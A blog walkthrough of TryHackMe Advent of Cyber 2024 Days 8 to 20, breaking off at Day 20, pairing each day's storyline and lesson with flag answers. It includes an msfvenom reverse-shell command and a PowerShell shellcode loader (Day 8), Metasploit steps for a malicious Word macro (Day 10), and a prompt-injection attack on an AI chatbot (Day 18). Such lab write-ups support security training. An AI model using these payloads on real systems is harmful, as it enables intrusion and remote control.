In this post, I will be writing the second part of TryHackMe Advent of Cyber 2024 Full Walkthrough starting from Day 7 till the end of the event. You can find the first part from this link.
To get the best out of this post, make sure you follow with the task readings in TryHackMe before checking the answers here.
COMPTIA Cyber Security Analyst (CySA+) Study Notes
HackTheBox Certified Defensive Security Analyst (CDSA) Study Notes
What is TryHackMe Advent of Cyber 2024
TryHackMe Advent of Cyber 2024 is open to all TryHackMe users, and the best part? It’s completely free to join. Plus, you’ll have the opportunity to win a share of this year’s massive $100,000 prize pool. The more challenges you complete, the greater your chances of scoring big prizes!
It’s like an advent calendar, but instead of chocolates, you’ll enjoy festive and engaging security challenges.
TryHackMe Advent of Cyber Day 8: Shellcodes of the world, unite!
Day 8 Storyline:
Glitch, a skilled but mistrusted hacker, was prepping for a tech conference. He was eager to share his shellcode script that remotely accessed his home system. As he worked, he noticed Mayor Malware’s henchmen lurking nearby.
“They’re wasting their time. I don’t have anything they’d want,” Glitch chuckled.
He didn’t realise that hidden in his home system was something they desperately sought—a research paper he wrote on Wareville’s defences, a treasure Mayor Malware was eager to obtain.
Learning Objectives
- Grasp the fundamentals of writing shellcode
- Generate shellcode for reverse shells
- Executing shellcode with PowerShell
Walkthrough
Essential Terminologies
- Shellcode: A piece of code usually used by malicious actors during exploits like buffer overflow attacks to inject commands into a vulnerable system, often leading to executing arbitrary commands or giving attackers control over a compromised machine. Shellcode is typically written in assembly language and delivered through various techniques, depending on the exploited vulnerability.
- PowerShell: A powerful scripting language and command-line shell built into Windows for task automation and configuration management. It allows users to interact with system components and is widely used by administrators for legitimate purposes. However, attackers often use PowerShell as a post-exploitation tool because of its deep access to system resources and ability to run scripts directly in memory, avoiding disk-based detection mechanisms.
- Windows Defender: A built-in security feature that detects and prevents malicious scripts, including PowerShell-based attacks, by scanning code at runtime. Common bypass methods for evading Defender include obfuscating scripts to disguise malicious content, making it harder for the software to recognise known patterns. Another technique is a reflective injection, where malicious code is loaded directly into memory, avoiding detection by signature-based defences. We will cover the latter one in this task.
- Windows API: The Windows Application Programming Interface (API) allows programs to interact with the underlying operating system, giving them access to essential system-level functions such as memory management, file operations, and networking. It serves as a bridge between the application and the operating system, enabling efficient resource handling. The Windows API is crucial because many exploitation techniques and malware rely on it to manipulate processes, allocate memory, and execute shellcodes. Common Windows API functions frequently used by malicious actors include
VirtualAlloc,CreateThread,WaitForSingleObject, which we will also use in this task for exploitation. - Accessing Windows API through PowerShell Reflection: Windows API via PowerShell Reflection is an advanced technique that enables dynamic interaction with the Windows API from PowerShell. Instead of relying on precompiled binaries, PowerShell Reflection allows attackers to call Windows API functions directly at runtime. This will enable them to manipulate low-level system processes, making it a primary tool for bypassing security mechanisms, interacting with the operating system, and executing code stealthily.
- Reverse shell: A type of connection in which the target (the machine you’re trying to hack) initiates a connection back to your attacking machine (in this case, your machine will be the AttackBox).
Generating Shellcode
Let’s explore how to create a shellcode to understand its structure. We’ll use a tool called msfvenom to generate a reverse shell.
In the AttackBox, open the terminal and run the following command:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell
This command will produce the shellcode for the reverse shell.
The command above generates a piece of shellcode using msfvenom. Here’s a breakdown of each component:
-p windows/x64/shell_reverse_tcp: The-poption specifies the payload type to create. In this case,windows/x64/shell_reverse_tcpgenerates a reverse shell payload for a 64-bit Windows system.LHOST=ATTACKBOX_IP: This sets the AttackBox’s IP address, which the reverse shell will use to establish a connection back to the attacker’s system.LPORT=1111: This defines the port number on the attacker’s machine that will be used to listen for incoming connections from the reverse shell. In this example, port 1111 is used, but it can be any available port, as long as it matches the listener configuration.-f powershell: This specifies the output format. Here, the payload is formatted for PowerShell, enabling it to be executed as a script on a Windows machine.
The shellcode referenced in the output above is a hex-encoded byte array, beginning with values like 0xfc, 0xe8, 0x82, and so on. These hexadecimal numbers represent machine instructions that the target system can execute. While computers operate in binary (1s and 0s), hexadecimal serves as a more human-readable representation, making it easier to interpret sequences like 0xfc rather than long binary strings.
To execute this shellcode, we can load it into memory and create a thread to run it. For this example, we will use PowerShell to leverage a few Windows APIs through C# code. Here’s a straightforward PowerShell script to execute the shellcode:
$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;
public class VrtAlloc{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@
Add-Type $VrtAlloc
$WaitFor= @"
using System;
using System.Runtime.InteropServices;
public class WaitFor{
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $WaitFor
$CrtThread= @"
using System;
using System.Runtime.InteropServices;
public class CrtThread{
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
Add-Type $CrtThread
[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
The script begins by defining several C# classes, which utilize the DllImport attribute to import specific functions from the kernel32.dll, a component of the Windows API.
- VirtualAlloc: Allocates memory within the process’s address space. This is often used to prepare memory for storing and running shellcode.
- CreateThread: Initiates a new thread in the process to execute the shellcode loaded into memory.
- WaitForSingleObject: Suspends execution until a designated thread completes its task, ensuring that the shellcode finishes executing.
These classes are then integrated into PowerShell using the Add-Type command, enabling PowerShell to invoke these functions.
Next, the script assigns the shellcode to the $buf variable, storing it as a byte array. In the example provided, SHELLCODE_PLACEHOLDER acts as a marker indicating where you would insert the actual shellcode generated earlier using msfvenom. Typically, this placeholder is replaced with the actual shellcode, represented as a sequence of hexadecimal values. These hex values contain the instructions that will be executed when the shellcode is run.
The script uses the VirtualAlloc function to allocate memory for storing the shellcode. The function is called with the following parameters:
0for the memory address, allowing Windows to select the location for allocation.$size, which specifies the size of the memory block based on the shellcode’s length.0x3000as the allocation type, instructing Windows to reserve and commit the memory.0x40for memory protection, ensuring the allocated memory is both readable and executable, which is essential for executing the shellcode.
Once memory is allocated, the Marshal.Copy function transfers the shellcode from the $buf array to the allocated memory location ($addr), making it ready for execution.
Once the shellcode is loaded into memory, the script invokes the CreateThread function to execute it by creating a new thread. This thread is configured to begin execution at the memory address where the shellcode resides ($addr). Subsequently, the script calls the WaitForSingleObject function to pause and wait until the shellcode execution completes. This ensures the shellcode finishes running entirely before the script terminates.
TryHackMe Advent of Cyber 2024 Day 8 Answers
What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt.
AOC{GOT _MY_ACCESS_B@CK007}
TryHackMe Advent of Cyber Day 9: Nine o’clock, make GRC fun, tell no one.
Day 9 Storyline
McSkidy and Glitch want to hire an eDiscovery company to process some forensic data for their investigation. They have invited bids from third parties for this purpose. Three companies have bid for the project. McSkidy and Glitch now need to do a risk assessment on all three of these companies to identify the one with the least amount of risk so that they can move forward. All three companies were required to fill out a questionnaire based on which a risk assessment will be done.
Introduction to GRC
Governance, Risk, and Compliance (GRC): A Cornerstone for Organisational Security
GRC is vital for organisations to ensure their security practices are in alignment with personal, regulatory, and legal obligations. While strong security practices inherently reduce the risk of breaches, organisations must also comply with sector-specific external regulations. For instance, the financial sector is governed by numerous security requirements:
- Reserve Bank Regulations: Banks must follow security mandates set by their country’s reserve bank, ensuring a baseline level of security to safeguard customer funds and data.
- SWIFT Customer Security Programme (CSP): After an $81 million SWIFT transfer fraud, SWIFT introduced the CSP to standardise security for banks using its network.
- Data Protection Standards: Given their access to sensitive customer data, banks must comply with data protection standards, often regulated by their country’s reserve bank.
Managing compliance with these regulations across diverse teams can be challenging. This is where GRC comes in, providing a structured approach to interpret external security requirements, translate them into internal policies, and enforce their consistent application across the organisation. GRC helps minimise risks and ensures the organisation meets its security obligations. Below are the three core components of GRC:
1. Governance
Governance involves developing the framework for making security-related decisions. This includes formulating the organisation’s security strategy, policies, standards, and practices to align with its overall objectives. Governance also defines roles and responsibilities to ensure the implementation and maintenance of these standards.
2. Risk
Risk management identifies, assesses, quantifies, and mitigates threats to the organisation’s IT assets. It helps uncover vulnerabilities, evaluate their potential impact, and implement measures to reduce risks to an acceptable level. For instance, simply using IT systems introduces cyber risks. Risk management enables organisations to prepare for and respond to cyber threats, reducing the likelihood and impact of incidents.
3. Compliance
Compliance ensures the organisation meets external legal, regulatory, and industry standards, such as GDPR, NIST, or ISO 27001. This function ensures that the organisation’s security practices align with all required frameworks, safeguarding against non-compliance penalties and enhancing overall security posture.
By integrating these functions, GRC enables organisations to navigate complex security landscapes while mitigating risks and maintaining regulatory adherence.
TryHackMe Advent of Cyber 2024 Day 9 Answers
What does GRC stand for?
Governance, Risk, and Compliance
What is the flag you receive after performing the risk assessment?
THM{R15K_M4N4G3D}
TryHackMe Advent of Cyber Day 10: He had a brain full of macros, and had shells in his soul
TryHackMe Advent of Cyber 2024 Day 10 Storyline
Mayor Malware attempts to phish one of the SOC-mas organizers by sending a document embedded with a malicious macro. Once opened, the macro will execute, giving the Mayor remote access to the organizer’s system.
Marta May Ware is surprised that her system was compromised even after following tight security, but McSkidy thinks she traced the attacker, and he got in. It’s none other than Mayor Malware who got into the system. This time, the Mayor used phishing to get his victim. McSkidy’s quick incident response prevented significant damage.
In this task, you will run a security assessment against Marta May Ware. The purpose would be to improve her security and raise her cyber security awareness against future attacks.
Glitch is still concerned about any future attack on Marta May Ware and advises McSkidy to run a phishing exercise on her to verify whether she is vigilant about these attacks.
Phishing Attacks
Security is only as strong as its weakest link, and many believe that humans represent that weakest link in the security chain. For example, is it harder to breach a patched system protected by a firewall, or to persuade someone to open an “urgent” document? This makes “human hacking,” a form of social engineering, one of the easiest attack methods to execute.
Phishing, a term derived from “fishing,” doesn’t involve seafood but instead refers to an attacker casting out bait to a large group of users. These messages are often crafted with a sense of urgency, pressuring recipients to act quickly without thinking critically. The goal is typically to steal sensitive information or deploy malware by convincing users to complete actions like filling out a form, clicking a link, or opening a file.
For instance, you might receive an unsolicited email claiming a large charge has been made to your account, prompting you to check an attached file or URL for more details. Once the malicious file is opened or the link is clicked, the attack is activated, potentially giving the attacker control over your system.
Macros
The requirements of MS Office users can vary widely, making it impossible for a default installation to meet everyone’s needs. Some users frequently perform repetitive tasks, such as formatting, inserting text, or conducting calculations. For instance, converting numbers into words—like turning “1337” into “one thousand three hundred thirty-seven”—can be incredibly time-consuming when dealing with large quantities. This highlights the need for an automated solution to save time and minimize manual effort.
In computing, a macro is a set of programmed instructions designed to streamline repetitive tasks. MS Word, along with other MS Office applications, allows users to incorporate macros into documents. These macros often provide significant time-saving benefits. However, in the realm of cybersecurity, such automated tools can be exploited for malicious purposes.
Creating the Malicious Document
The initial step involves embedding a malicious macro into the document. Alternatively, the Metasploit Framework can be used to create such a document, eliminating the need for a system with MS Office installed.
To create the document with the malicious macro using the Metasploit Framework, follow these steps:
- Launch Metasploit Framework: Open a new terminal window and run
msfconsoleto start the Metasploit Framework. - Set the Payload: Use the command
set payload windows/meterpreter/reverse_tcpto specify the payload, which establishes a reverse shell by connecting to the specified host. - Select the Module: Use the command
use exploit/multi/fileformat/office_word_macroto choose the module for creating a document with an embedded macro. Note that this is technically not an exploit but a module designed for this purpose. - Configure LHOST: Set the attacker’s IP address with the command
set LHOST CONNECTION_IP, whereCONNECTION_IPrepresents the IP address of the AttackBox. - Configure LPORT: Specify the listening port on the AttackBox with the command
set LPORT 8888. - Verify Settings: Use the
show optionscommand to review and confirm that the IP address and port number are correctly configured. - Generate the Document: Execute the
exploitcommand to create a document with the malicious macro embedded. - Exit: Use the
exitcommand to quit Metasploit and return to the terminal.
This process will create a document with a malicious macro, ready for deployment.
TryHackMe Advent of Cyber 2024 Day 10 Answers
What is the flag value inside the flag.txt file that’s located on the Administrator’s desktop?
THM{PHISHING_CHRISTMAS}
TryHackMe Advent of Cyber Day 11: If you’d like to WPA, press the star key!
TryHackMe Advent of Cyber 2024 Day 11 Storyline
The much-awaited SOC-mas of Wareville town is just days away! Glitch, the unsung hero, is closing all the doors to Mayor Malware’s malicious intentions one by one. However, there is still much more to do.
McSkidy took a thoughtful breath. “Mayor can still find his way in!”
Glitch smiles confidently. “I think I know the last technique he relies on to get into the networks.”
McSkidy stands up from her chair with a surge of excitement. “Let me guess, it’s a notorious way to get into a network – a Wi-Fi attack?!”
Glitch nods decisively. “Exactly! Let’s be one step ahead of the Mayor.”
Learning Objectives
- Understand what Wi-Fi is
- Explore its importance for an organisation
- Learn the different Wi-Fi attacks
- Learn about the WPA/WPA2 cracking attack
WiFi Basics
The significance of the Internet in our daily lives is universally understood and requires no explanation. Wi-Fi serves as the technology that connects our devices to this vast global network, the Internet. While the connection between our devices and the Internet may seem entirely wireless, this is only partly true. Our devices connect wirelessly to a router, which serves as a bridge to the Internet, and the router itself is linked to the Internet through a wired connection.
To access Wi-Fi, we activate it on our devices, which then display a list of available Wi-Fi networks in the vicinity. This list consists of access points (usually routers) broadcasting Wi-Fi signals with a unique SSID, or network name. You can connect to any of these networks if you have the correct password, also referred to as a pre-shared key (PSK). Once connected, your device is assigned an IP address within that network, acting as a unique identifier to facilitate communication with other devices. It is similar to becoming part of a family where you are given a trusted, recognizable name.
Most organizations depend on the Internet for their business operations. Connecting all employees to the Internet through wired connections raises concerns regarding cost, efficiency, and workplace flexibility. As a result, many organizations opt for Wi-Fi networks to provide employees with Internet access. When employees connect to the organization’s network, they create a network of interconnected devices that can communicate with one another, enabling them to make and respond to requests seamlessly. To prevent misuse of network privileges, organizations typically hire reliable and professional employees.
Despite these precautions, a malicious outsider can still detect the organization’s broadcasted Wi-Fi SSID when scanning for networks. While this may not appear to be an issue since the attacker doesn’t have the password, they may have other intentions in mind!
WiFi Attacks
Attackers use several techniques to exploit Wi-Fi technology. It’s important to note that the information provided here is strictly for educational purposes. Unauthorized attempts to access or compromise networks are illegal and can result in severe legal consequences. With that in mind, here are some of the most common techniques:
- Evil Twin Attack:
In this attack, the attacker creates a counterfeit Wi-Fi access point with a name resembling a trusted one. For instance, if your Wi-Fi is called “Home_Internet,” the attacker might set up a fake access point named “Home_Internnet” or something similarly misleading. The attack begins with the attacker sending de-authentication packets to disconnect users from the legitimate network. Frustrated by the repeated disconnections, users might check the available Wi-Fi networks and unknowingly connect to the attacker’s fake access point, often attracted by its stronger signal. Once connected, the attacker can monitor the user’s internet traffic. - Rogue Access Point:
This attack has a similar goal to the evil twin attack. Here, the attacker sets up an open Wi-Fi access point near or within an organization’s premises. Users, especially those whose devices automatically connect to open Wi-Fi networks, may inadvertently join this rogue access point. Once connected, the attacker can intercept and monitor all their communication. - WPS Attack:
Wi-Fi Protected Setup (WPS) simplifies the process of connecting to Wi-Fi networks using an 8-digit PIN instead of a complex password. Unfortunately, this PIN system can be exploited on certain networks due to insecure configurations. Attackers initiate a WPS handshake with the router and capture its response, which contains data related to the PIN. They then use brute-force techniques to extract the PIN and gain access to the Pre-Shared Key (PSK). - WPA/WPA2 Cracking:
Wi-Fi Protected Access (WPA) and its successor WPA2 are designed to secure wireless communication using strong encryption. However, the security depends heavily on the strength of the Pre-Shared Key (PSK). Attackers exploit this by sending de-authentication packets to disconnect a legitimate user from the Wi-Fi network. When the user attempts to reconnect, a 4-way handshake with the router occurs. The attacker, using a device in monitor mode, captures this handshake. The captured data is then subjected to brute-force or dictionary attacks to crack the Wi-Fi password.
Understanding these techniques highlights the importance of implementing strong security measures for Wi-Fi networks to minimize vulnerabilities.
TryHackMe Advent of Cyber 2024 Day 11 Answers
What is the BSSID of our wireless interface?
02:00:00:00:02:00
What is the SSID and BSSID of the access point? Format: SSID, BSSID
MalwareM_AP, 02:00:00:00:00:00
What is the BSSID of the wireless interface that is already connected to the access point?
02:00:00:00:01:00
What is the PSK after performing the WPA cracking attack?
fluffy/champ24
TryHackMe Advent of Cyber Day 12: If I can’t steal their money, I’ll steal their joy!
Day 12 Storyline:
Wareville’s bank had a huge turnover this year and expected a massive profit before the holiday season. They were eager to disclose this news to the town’s people during the SOC-mas celebrations. However, to their surprise, things went the other way around. After completing the annual calculations, the accountants were shocked to see a considerable loss. They observed discrepancies in the account balances.
The bank called McSkidy to help investigate these users’ fraudulent transactions. Upon analysing the bank’s website’s transactional logs, McSkidy found some interesting transactions. Few users, including the Mayor’s team initiated multiple transactions from Wareville’s reserve accounts at once. Surprisingly, all these transactions succeeded despite exceeding the users’ current balance. Glitch was already aware of the critical vulnerability (allowing these fraudulent transactions) that Mayor Malware and his alliances exploited.
Learning Objectives
- Understand the concept of race condition vulnerabilities
- Identify the gaps introduced by HTTP2
- Exploit race conditions in a controlled environment
- Learn how to fix the race
Web Timing and Race Conditions
Conventional web applications are relatively straightforward to understand, analyze, and exploit. If there’s an issue in the application’s code, we can manipulate it into performing unintended actions by sending specific inputs. These vulnerabilities are easier to grasp because there’s often a direct correlation between the input and the output—sending flawed input results in flawed output, clearly indicating a problem. But what if vulnerabilities could be discovered using only valid data? What if the issue lies not in the data itself but in the way it’s delivered? This is where web timing and race condition attacks come into play. Let’s explore this fascinating and often overlooked attack vector!
At its core, a web timing attack involves extracting information from a web application by analyzing how long it takes to process requests. By making subtle adjustments to the data we send or the way we send it, and then measuring the response times, we can uncover unauthorized information.
Race conditions represent a specialized form of web timing attack. These go beyond just accessing sensitive data; they enable attackers to manipulate the application into performing unintended actions on their behalf.
Web timing vulnerabilities can be extremely subtle. Research shows that response time differences as small as 1300ms down to 5ns have been exploited in attacks. Their nuanced nature makes them difficult to detect, often requiring diverse testing techniques. However, with the growing adoption of HTTP/2, identifying and exploiting these vulnerabilities has become somewhat easier.
Timing attacks are often categorized into two primary types:
Information Disclosures
By exploiting differences in response times, an attacker can gain access to information that should remain confidential. For instance, variations in timing can be used to deduce valid usernames in an application, paving the way for password-guessing attempts and unauthorized account access.
Race Conditions
Race conditions, akin to business logic flaws, enable an attacker to trigger unintended actions in an application. However, the underlying issue lies in how the web application handles requests, which creates the opportunity for a race condition. For example, repeatedly submitting the same coupon request simultaneously might allow it to be applied multiple times.
TryHackMe Advent of Cyber 2024 Day 12 Answers
What is the flag value after transferring over $2000 from Glitch’s account?
THM{WON_THE_RACE_007}
TryHackMe Advent of Cyber Day 13: It came without buffering! It came without lag!
Day 13 Storyline:
Wares are all about security. The Glitch discovers that an app is illegally tracking the cars in Wareville. Not many car thefts in the city warrant such an extreme measure. He reaches out to McSkidy to investigate and identify how the application is tracking them and leaking users’ positions.
Learning Objectives
- Learn about WebSockets and their vulnerabilities.
- Learn how WebSocket Message Manipulation can be done.
Introduction to WebSocket
WebSockets allow your browser and server to maintain a continuous connection for communication. Unlike the traditional approach of making a request, receiving a response, and disconnecting, WebSockets function like an open phone line, enabling real-time exchanges as needed. Once the connection is established, both the client and server can interact freely without repeated requests.
This makes WebSockets ideal for applications like live chat, real-time gaming, or any service that requires continuous updates. After an initial handshake to establish the connection, either side can send messages anytime, reducing overhead and enabling faster, more efficient data exchange for real-time needs.
Traditional HTTP Requests vs. WebSocket
When you use regular HTTP, your browser sends a request to the server, and the server responds, then closes the connection. If you need new data, you have to make another request. Think of it like knocking on someone’s door every time you want something—they’ll answer, but it can get tiring if you need updates constantly.
Take a chat app as an example. With HTTP, your browser would keep asking, “Any new messages?” every few seconds. This method, known as polling, works but isn’t efficient. Both the browser and the server end up doing a lot of unnecessary work just to stay updated.
WebSockets handle things differently. Once the connection is established, it remains open, allowing the server to push updates to you whenever there’s something new. It’s more like leaving the door open so updates can come in immediately without the constant back-and-forth. This approach is faster and uses fewer resources.
WebSocket Vulnerabilities
While WebSockets can improve performance, they also present security challenges that developers must address. Since WebSocket connections remain open and active, they can be exploited if appropriate security measures are not implemented. Below are some common vulnerabilities:
- Weak Authentication and Authorization: Unlike standard HTTP, WebSockets lack built-in mechanisms for user authentication or session validation. Without proper controls, attackers may gain unauthorized access to sensitive information or manipulate the connection.
- Message Tampering: The continuous data flow in WebSockets creates opportunities for attackers to intercept and alter messages if encryption is not employed. This can lead to malicious command injection, unauthorized actions, or corrupted data exchanges.
- Cross-Site WebSocket Hijacking (CSWSH): This occurs when an attacker deceives a user’s browser into initiating a WebSocket connection with another site. If successful, the attacker can potentially hijack the connection or access data intended for the legitimate server.
- Denial of Service (DoS): WebSocket connections’ persistent nature makes them susceptible to DoS attacks. An attacker could overwhelm the server with excessive messages, leading to performance degradation or a complete server crash.
TryHackMe Advent of Cyber 2024 Day 13 Answers
What is the value of Flag1?
THM{dude_where_is_my_car}
What is the value of Flag2?
THM{my_name_is_malware._mayor_malware}
TryHackMe Advent of Cyber Day 14: Even if we’re horribly mismanaged, there’ll be no sad faces on SOC-mas!
Day 14 Storyline
It’s a quiet morning in the town of Wareville. A wholesome town where cheer and tech come together. McSkidy is charged to protect the GiftScheduler, the service elves use to schedule all the presents to be delivered in Wareville. She assigned Glitch to the case to make sure the site is secure for G-Day (Gift Day). In the meantime, Mayor Malware works tirelessly, hoping to not only ruin Christmas by redirecting presents to the wrong addresses but also to ensure that Glitch is blamed for the attack. After all, Glitch’s warnings about the same vulnerabilities Mayor Malware is exploiting make the hacker an easy scapegoat.
Learning Objectives
Self-signed certificates
Man-in-the-middle attacks
Using Burp Suite proxy to intercept traffic
TryHackMe Advent of Cyber Day 14 Answers
What is the name of the CA that has signed the Gift Scheduler certificate?
THM
Look inside the POST requests in the HTTP history. What is the password for the snowballelf account?
c4rrotn0s3
Use the credentials for any of the elves to authenticate to the Gift Scheduler website. What is the flag shown on the elves’ scheduling page?
THM{AoC-3lf0nth3Sh3lf}
What is the password for Marta May Ware’s account?
H0llyJ0llySOCMAS!
Mayor Malware finally succeeded in his evil intent: with Marta May Ware’s username and password, he can finally access the administrative console for the Gift Scheduler. G-Day is cancelled!
What is the flag shown on the admin page?
THM{AoC-h0wt0ru1nG1ftD4y}
TryHackMe Advent of Cyber Day 15: Be it ever so heinous, there’s no place like Domain Controller.
Day 15 Storyline
Ahead of SOC-mas, the team decided to do a routine security check of one of their Active Directory domain controllers. Upon some quick auditing, the team noticed something was off. Could it be? The domain controller has been breached? With sweat on their brows, the SOC team smashed the glass and hit the panic alarm. There’s only one person who can save us…
Learning Objectives
- Learn about the structures of Active Directory.
- Learn about common Active Directory attacks.
- Investigate a breach against an Active Directory.
Day 15 Storyline Answers
On what day was Glitch_Malware last logged in?
Answer format: DD/MM/YYYY
07/11/2024
What event ID shows the login of the Glitch_Malware user?
4624
Read the PowerShell history of the Administrator account. What was the command that was used to enumerate Active Directory users?
Get-ADUser -Filter * -Properties MemberOf | Select-Object Name
Look in the PowerShell log file located in Application and Services Logs -> Windows PowerShell. What was Glitch_Malware’s set password?
SuperSecretP@ssw0rd!
Review the Group Policy Objects present on the machine. What is the name of the installed GPO?
Malicious GPO – Glitch_Malware Persistence
TryHackMe Advent of Cyber Day 16: The Wareville’s Key Vault grew three sizes that day
Day 16 Storyline
It was late. Too late. McSkidy’s eyelids felt as though they had dumbbells attached to them. The sun had long since waved goodbye to Wareville, and the crisp night air was creeping in through the window of McSkidy’s office. If only there were a substance which would both warm and wake her up. Once McSkidy’s brain cells had started functioning again, and remembered that coffee existed. Checking her watch, she was saddened to learn it was too late to get her coffee from her favourite Wareville coffee house, Splunkin Donuts; the vending machine downstairs would have to do. Sipping her coffee, McSkidy immediately lit up and charged back into the office, ready to crack the case; however, as she entered, the Glitch had an idea of his own. He’d got it, and he figured out an attack vector the user had likely taken! McSkidy took a seat next to the Glitch, and he began to walk it through.
Learning Objectives
- Learn about Azure, what it is and why it is used.
- Learn about Azure services like Azure Key Vault and Microsoft Entra ID.
- Learn how to interact with an Azure tenant using Azure Cloud Shell.
TryHackMe Advent of Cyber Day 16 Answers
What is the password for backupware that was leaked?
#command
az ad user list –filter “startsWith(‘wvusr-‘, displayName)”
R3c0v3r_s3cr3ts!
What is the group ID of the Secret Recovery Group?
#command
az ad group list
7d96660a-02e1-4112-9515-1762d0cb66b7
What is the name of the vault secret?
#command
az keyvault secret list –vault-name warevillesecrets
aoc2024
What are the contents of the secret stored in the vault?
#command
az keyvault secret show –vault-name warevillesecrets –name aoc2024
WhereIsMyMind1999
TryHackMe Advent of Cyber Day 17: He analyzed and analyzed till his analyzer was sore!
Day 17 Storyline
Marta May Ware is going crazy: someone has disconnected the main server from the Wareville network, and nobody knows who it is! As soon as she realized it, she contacted Wareville’s top physical security company, WareSec&Aware, to let her view the data centre’s CCTV streams. They forbade it entirely: for privacy reasons, only the camera owner can view the recordings. Not even the WareSec&Aware employees themselves are allowed to do so.
Still, they said there was no recording of anybody entering the data centre yesterday! How could that be, wondered Marta May, desperate for answers. Their first supposition was that the owner of the cameras must have deleted the recordings from their managing web page. But the data centre’s camera owner surely can’t be the perpetrator: it is no other than Byte, Glitch’s dog! Glitch insisted with Marta to leave the ownership of the cameras to Byte precisely to avoid these kinds of happenings: Byte, the ultimate good boy, combines loyalty and sharp instincts to keep any place safe.
Marta May calls Glitch and McSkidy right away, explaining the situation in between the sobs. Glitch’s eyes darken: Someone is trying to frame Byte, and he will not let anybody vex his beautiful dog!
McSkidy is perplexed: why are the people at WareSec&Aware “supposing” that Byte had deleted the recordings? Shouldn’t they have some logs to prove such an accusation?
Marta May has the answer: they do have some log files that they back up every 6 hours, give or take.
But they can’t search through it—or rather, they tried, but when they go and search for some keyword like the data centre’s cameras’ IDs or the action “delete”, this is what they get:
user@tryhackme$ cat cctv_logs.log| grep -i "11"
2024-12-16 22:53:06 WatchCamera 5 byte 11 rij5uu4gt204q0d3eb7jj86okt
RecordingInfo: 1 11 rij5uu4gt204q0d3eb7jj86okt
2024-12-16 22:53:22 WatchCamera 5 byte 11 rij5uu4gt204q0d3eb7jj86okt
RecordingInfo: 1 11 rij5uu4gt204q0d3eb7jj86okt
2024-12-16 22:53:25 WatchCamera 5 byte 11 rij5uu4gt204q0d3eb7jj86okt
user@tryhackme$
user@tryhackme$ cat cctv_logs.log| grep -i "download"
2024-12-16 22:52:50 DownloadRecording 5 byte 51 10 opfg6ns9khsbpq0u4us6dro2m8
Unreadable!
McSkidy shakes her head: they must immediately send the log file to the SOC team! Armed with a SIEM, no log is unsearchable!
Learning Objectives
In this task, we will explore the following learning objectives while investigating the logs related to the incident scenario explained above:
- Learn how to extract custom fields in Splunk
- Learn to create a parser for the custom logs
- Filter and narrow down the search results using Search Processing Language (SPL)
- How to investigate in Splunk
TryHackMe Advent of Cyber Day 17 Answers
Extract all the events from the cctv_feed logs. How many logs were captured associated with the successful login?
# run this in splunk
index=cctv_feed *successful*
642
What is the Session_id associated with the attacker who deleted the recording?
# run this in splunk
index=cctv_feed *delete*
rij5uu4gt204q0d3eb7jj86okt
What is the name of the attacker found in the logs, who deleted the CCTV footage?
# run this in splunk
index=cctv_feed *lsr1743nkskt3r722momvhjcs3*
mmalware
TryHackMe Advent of Cyber Day 18: I could use a little AI interaction!
Day 18 Storyline
Hyped with their latest release, a “health checker” service that tracks the health and uptime of the Wareville systems, the Wareville developers envisage the day in which the inhabitants of Wareville have a one-stop shop for seeking the answers to life’s mysteries and aiding them in their day-to-day jobs.
As an initial first stage, the Wareville developers create an alpha version of WareWise – Wareville’s intelligent assistant. Aware of the potential dangers of intelligent AI being interacted with, the developers decided to slowly roll out the chatbot and its features.
The IT department is the first to get hands-on with WareWise. For the IT department, WareWise has been integrated with the “health checker” service, making it much easier for the IT department to query the status of their servers and workstations.
Learning Objectives
In today’s task, you will:
- Gain a fundamental understanding of how AI chatbots work
- Learn some vulnerabilities faced by AI chatbots
- Practice a prompt injection attack on WareWise, Wareville’s AI-powered assistant
TryHackMe Advent of Cyber Day 18 Answers
What is the technical term for a set of rules and instructions given to a chatbot?
system prompt
What query should we use if we wanted to get the “status” of the health service from the in-house API?
Use the health service with the query: status
After achieving a reverse shell, look around for a flag.txt. What is the value?
THM{WareW1se_Br3ach3d}
TryHackMe Advent of Cyber Day 19: I merely noticed that you’re improperly stored, my dear secret!
Day 19 Storyline
Glitch was keen on uncovering Mayor Malware’s deeds. Today, he was sure he would find something neat. He knew the Mayor had an office downtown, where he kept his dirty laundry, the big old clown. He approached the site silently, not knowing the door was closed, so untimely. At the front of the door, a smart lock awaited; Glitch smiled cause he knew it could be subverted. But oh, big surprise, the lock was eerie; a game controlled it; Glith almost went teary.
If you are wondering how this came to be, Mayor Malware himself will explain it quickly. “Technology gets broken every day” was his claim, “but nobody knows how to hack a game.”
Will Glitch be able to pass through this door, or will he end up with zero as his score?
Learning Objectives
- Understand how to interact with an executable’s API.
- Intercept and modify internal APIs using Frida.
- Hack a game with the help of Frida.
TryHackMe Advent of Cyber Day 19 Answers
Q1) What is the OTP flag?
Answers :- THM{one_tough_password}
Q2) What is the billionaire item flag?
Answers :- THM{credit_card_undeclined}
Q3) What is the biometric flag?
Answers :- THM{dont_smash_your_keyboard}
Q4) If you liked today’s task, you can practice your skills with “Memories of Christmas Past” from Advent of Cyber 2023.
Answers :- No answer needed
TryHackMe Advent of Cyber Day 20: If you utter so much as one packet…
Day 20 Storyline:
McSkidy sat at her desk, staring at the PCAP file Glitch had just sent over. It was from Marta May Ware’s computer, the latest victim of Mayor Malware’s long-running schemes.
She smiled, glancing at Byte. “Looks like we’d have to use Wireshark again, eh boy?”
Glitch’s voice crackled over the comms. “Need any help analyzing it?”
